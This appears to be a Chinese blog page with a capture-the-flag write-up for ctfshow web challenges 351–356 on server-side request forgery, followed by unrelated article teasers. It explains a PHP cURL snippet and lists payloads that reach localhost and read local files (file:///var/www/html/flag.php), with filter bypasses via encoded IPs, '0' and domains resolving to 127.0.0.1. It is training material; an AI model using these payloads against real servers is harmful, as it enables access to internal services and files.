当前位置：首页 > article >正文

ctfshow——web入门351~356

article 2025/9/30 11:19:17

SSRF没有出网的部分

web入门351


$ch = curl_init($url);

作用：初始化一个 cURL 会话，并设置目标 URL。
解释：

- curl_init($url) 创建一个新的 cURL 资源，并将其与 $url 关联。
- 这里的 $url 是用户提供的，因此目标地址完全由用户控制。


curl_setopt($ch, CURLOPT_HEADER, 0);

作用：设置 cURL 选项，不包含响应头。
解释：

- CURLOPT_HEADER 控制是否在输出中包含 HTTP 响应头。
- 设置为 0 表示不包含响应头，只返回响应体。


curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

作用：设置 cURL 选项，将响应作为字符串返回，而不是直接输出。
解释：

- 默认情况下，cURL 会直接将响应输出到页面上。
- 设置 CURLOPT_RETURNTRANSFER 为 1 后，响应会被存储到变量中，而不是直接输出。


$result = curl_exec($ch);

作用：执行 cURL 请求，并获取响应结果。
解释：

- curl_exec($ch) 执行之前配置好的 cURL 请求，并将响应内容存储到 $result 中。
- 如果请求失败，$result 的值可能为 false。


curl_close($ch);

作用：关闭 cURL 会话，释放资源。
解释：

- 在完成 cURL 操作后，调用 curl_close($ch) 关闭 cURL 资源，避免资源泄漏

payload：

url=localhost/flag.php

url=127.0.0.1/flag.php

url=file:///var/www/html/flag.php

web入门352

emmm这题怎么说呢，过滤的语句不完全，上题的payload照样可以用

那我们假设他完全

url=http://0.0.0.0/flag.php

url=http://127.255.255.253/flag.php（127开头的都行）

url=http://2130706433/flag.php（ip转数字）<-网站

url=http://127.000.000.001/flag.php

url=http://0x7f000001/flag.php（16进制写法）

web入门353

这个写全了，但是这个禁止的是127.0形式的，也就是127.1.1.1就可以绕过

还有

url=http://2130706433/flag.php

url=http://0x7f000001/flag.php

多几个0也可以

使用sudo.cc代替127.0.0.1

url=http://sudo.cc/flag.php

在Linux中0表示自身的地址

用http://0/flag.php 绕过

web入门354

这题禁了1和0

url=http://sudo.cc/flag.php

使用解析到127.0.0.1的url绕过

url=http://safe.taobao.com/flag.php

url=http://spoofed.burpcollaborator.net/flag.php

（这两个是其他师傅提供的可以用的）

web入门355

对host长度进行了限制，即主机名小于等于5

payload：

url=http://0/flag.php

url=http://127.9/flag.php

url=http://0.0.0/flag.php

web入门356

主机名小于3

payload：
url=http://0/flag.php

url=http://0.0/flag.php

ctfshow——web入门351~356

SSRF没有出网的部分 web入门351 $ch curl_init($url); 作用：初始化一个 cURL 会话，并设置目标 URL。解释： curl_init($url) 创建一个新的 cURL 资源，并将其与 $url 关联。这里的 $url 是用户提供的，因此目标地址完全…...

编程日记 2025/9/28 11:33:34

C++中六个特殊成员函数的关系

C中六个特殊成员函数的关系 C11之后的版本每个类有六个特殊的成员函数，之所以特殊是因为它们可以在各种情况下由编译器自动提供； 默认构造函数、复制构造函数、复制赋值运算符、析构函数、移动构造函数、移动赋值运算符关系规则： 1、如果…...

编程日记 2025/9/19 12:13:57

【PostgreSQL数据分析实战：从数据清洗到可视化全流程】金融风控分析案例-10.1 风险数据清洗与特征工程

👉 点击关注不迷路 👉 点击关注不迷路 👉 点击关注不迷路文章大纲 PostgreSQL金融风控分析案例：风险数据清洗与特征工程实战一、案例背景：金融风控数据处理需求二、风险数据清洗实战（一）缺失值…...

编程日记 2025/9/29 6:38:48

美女热舞混剪视频批量剪辑生产技术实践：智能处理与原创性提升方案解析

一、引言：短视频工业化生产的技术转型在美女类短视频内容运营中，通过标准化技术流程实现「高质量、规模化」产出成为核心需求。本文结合实战经验，解析如何通过智能素材重组、AI 语音合成、动态元素叠加等技术手段，构建自动化生产…...

编程日记 2025/9/28 20:56:34

破局智算瓶颈：400G光模块如何重构AI时代的网络神经脉络

一、技术演进与市场需求双重驱动在数字化转型浪潮下，全球互联网流量正以每年30%的复合增长率持续攀升。根据Dell’Oro Group最新报告，2023年400G光模块市场规模已突破15亿美元，预计2026年将占据数据中心光模块市场60%以上份额。这种爆发式增…...

编程日记 2025/9/20 4:34:07

python标准库--collections - 高性能数据结构在算法比赛的应用

目录一、deque双端队列 1.头部删除元素popleft（） 2.BFS（广度优先搜索）优化 3.滑动窗口（双指针） 4.实现栈或队列 5. 双向遍历与操作一、deque双端队列特点：支持两端 O (1) 时间复杂度的…...

编程日记 2025/8/10 14:50:43

神经网络基础-从零开始搭建一个神经网络

一、什么是神经网络人工神经网络（Articial Neural Network，简写为ANN）也称为神经网络（NN),是一种模仿生物神经网络和功能的计算模型，人脑可以看做是一个生物神经网络，由众多的神经元连接而成，各个神经元传递复杂的电信号，树突接收到输入信号，然后对信号进行处理，通…...

编程日记 2025/9/28 14:10:16

【Go】优化文件下载处理：从多级复制到零拷贝流式处理

在开发音频处理服务过程中，我们面临一个常见需求：从网络下载音频文件并保存到本地。这个看似简单的操作，实际上有很多优化空间。本文将分享一个逐步优化的过程，展示如何从一个基础实现逐步改进到高效的流式下载方案。初始实现&a…...

编程日记 2025/9/18 2:35:07

Java 显式锁与 Condition 的使用详解

Java 显式锁与 Condition 的使用详解在多线程编程中，线程间的协作与同步是核心问题。Java 提供了多种机制来实现线程同步，除了传统的 synchronized 关键字外，ReentrantLock 和 Condition 是更灵活且功能强大的替代方案。本文将详细介绍显式…...

编程日记 2025/9/23 5:27:38

android ViewModel liveData无法监听之多线程下activityViewModels不安全

我们一般的，会遇到liveData无法监听到结果，可能存在主要2种可能： liveData没有正确注册；liveData连续多次设置值，中间的值，会被丢弃，但最后一次是能监听到的。但是我们容易忽略一种case&…...

编程日记 2025/9/30 8:00:15

#Redis黑马点评#（五）Redisson原理详解

目录一基于Redis的分布式锁优化二 Redisson 1 实现步骤 2 Redisson可重入锁机制 3 Redisson可重试机制 4 Redisson超时释放机制 5 RedissonMultiLock解决主从一致性三 trylock与lock两者有何区别四 Redis优化秒杀一基于Redis的分布式锁优化二 Redisson Redis…...

编程日记 2025/9/28 11:30:56

23.（vue3.x+vite）引入组件并动态切换（component）

让多个组件使用同一个挂载点，并动态切换，这就是动态组件效果截图 A组件代码： <template><div><div>{{message }}</</...

编程日记 2025/9/28 16:29:16

VBA会被Python代替吗

VBA不会完全被Python取代、但Python在自动化、数据分析与跨平台开发等方面的优势使其越来越受欢迎、两者将长期并存且各具优势。 Python以其易于学习的语法、强大的开源生态系统和跨平台支持，逐渐成为自动化和数据分析领域的主流工具。然而，VBA依旧在Exc…...

编程日记 2025/9/29 2:23:21

2025 年福建省职业院校技能大赛网络建设与运维赛项Linux赛题解析

准备环境：系统安装及网络配置 [!TIP] 接下来将完全按照国赛评分标准进行，过程中需要掌握基础的Linux命令以及理解Linux系统，建议大家在做题前将Linux基础命令熟练运用网络建设与运维赛项详细教程请联系主页一、X86架构计算机操作系统安装…...

编程日记 2025/7/15 0:55:08

SEMI E40-0200 STANDARD FOR PROCESSING MANAGEMENT(加工管理标准)-(三)完结

10 消息服务详情 10.1 本章定义实现加工管理概念所需的消息服务。这些消息已在第8.1节中初步介绍。协议无关性：这些服务独立于所使用的消息协议，可映射至SECS-II（SEMI E5）或其他类似协议。 10.1.1 消息服务定义内容包括&#…...

编程日记 2025/9/28 18:33:12

MySQL数据库创建、删除、修改

一：建库建表我们以学校体系进行建表。将数据库命名为school。以下代码中的大写均可小写不影响。如CREATE DATABASE与create database相同四个关键的实体分别是学院、老师、学生和课程，其中，学生跟学院是从属关系，这个关系从…...

编程日记 2025/9/29 7:48:06

招行数字金融挑战赛数据赛道赛题一

赛题描述：根据提供的用户行为数据，选手需要分析用户行为特征与广告内容的匹配关系，准确预测用户对测试集广告的点击情况，通过AUC计算得分。得分0.6120，排名60。尝试了很多模型都没有能够提升效果，好奇大…...

编程日记 2025/9/23 4:20:52

【氮化镓】GaN在不同电子能量损失的SHI辐射下的损伤

该文的主要发现和结论如下： GaN的再结晶特性：GaN在离子撞击区域具有较高的再结晶倾向，这导致其形成永久损伤的阈值较高。在所有研究的电子能量损失 regime 下，GaN都表现出这种倾向，但在电子能量损失增加时，其效率会降低，尤其是在材料发生解离并形成N₂气泡时。能量损失…...

编程日记 2025/9/29 6:10:00

容器化-Docker-私有仓库Harbor

一、Harbor 的含义与作用 Harbor 是一个开源的企业级 Docker 镜像仓库，它为用户提供了安全、高效的 Docker 镜像管理方案。其核心功能是集中管理 Docker 中所有的镜像，涵盖了镜像的存储、分发、版本控制等全生命周期管理。通过使用 Harbor，企业和团队能够显著提升 Docker…...

编程日记 2025/9/25 5:56:49

【Leetcode 每日一题】1550. 存在连续三个奇数的数组

问题背景给你一个整数数组 a r r arr arr，请你判断数组中是否存在连续三个元素都是奇数的情况：如果存在，请返回 t r u e true true；否则，返回 f a l s e false false。数据约束 1 ≤ a r r . l e n g t h ≤ 10…...

编程日记 2025/8/12 0:17:47

C#中SetProperty方法使用

SetProperty 是 MVVM（Model-View-ViewModel） 模式中用于实现属性变更通知（INotifyPropertyChanged） 的核心方法，主要用于在属性值变化时自动更新 UI 绑定。 1. SetProperty 的基本作用更新字段值：修改属性…...

编程日记 2025/6/14 5:42:14

防火墙来回路径不一致导致的业务异常

案例拓扑： 拓扑描述： 服务器有2块网卡，内网网卡2.2.2.1/24 网关2.2.254 提供内网用户访问； 外网网卡1.1.1.1/24，外网网关1.1.1.254 80端口映射到公网这个时候服务器有2条默认路由，分布是0.0.0.0 0.0.0.0 1…...

编程日记 2025/9/29 1:16:44

WTK6900C-48L：离线语音芯片重构玩具DNA，从“按键操控”到“声控陪伴”的交互跃迁

一：开发背景随着消费升级和AI技术进步，传统玩具的机械式互动已难以满足市场需求。语音控制芯片的引入使玩具实现了从被动玩耍到智能交互的跨越式发展。通过集成高性价比的语音识别芯片，现代智能玩具不仅能精准响应儿童指令，还能实…...

编程日记 2025/9/28 15:39:30

[Java实战]Spring Boot 中Starter机制与自定义Starter实战（九）

[Java实战]Spring Boot 中Starter机制与自定义Starter实战（九） 引言 Spring Boot 的 Starter 是其“约定优于配置”理念的核心体现，通过简化依赖管理和自动配置，极大提升了开发效率。本文将深入剖析 Starter 的设计思想、实现原…...

编程日记 2025/6/22 9:49:07

电商双十一美妆数据分析

1. 数据读取与基础查看库导入：使用 import numpy as np 和 import pandas as pd 导入常用数据分析库。数据读取： df pd.read_csv(双十一_淘宝美妆数据.csv) 读取数据文件。数据查看：通过 df.head() 查看数据前几行； df.info() 了…...

编程日记 2025/6/24 3:16:24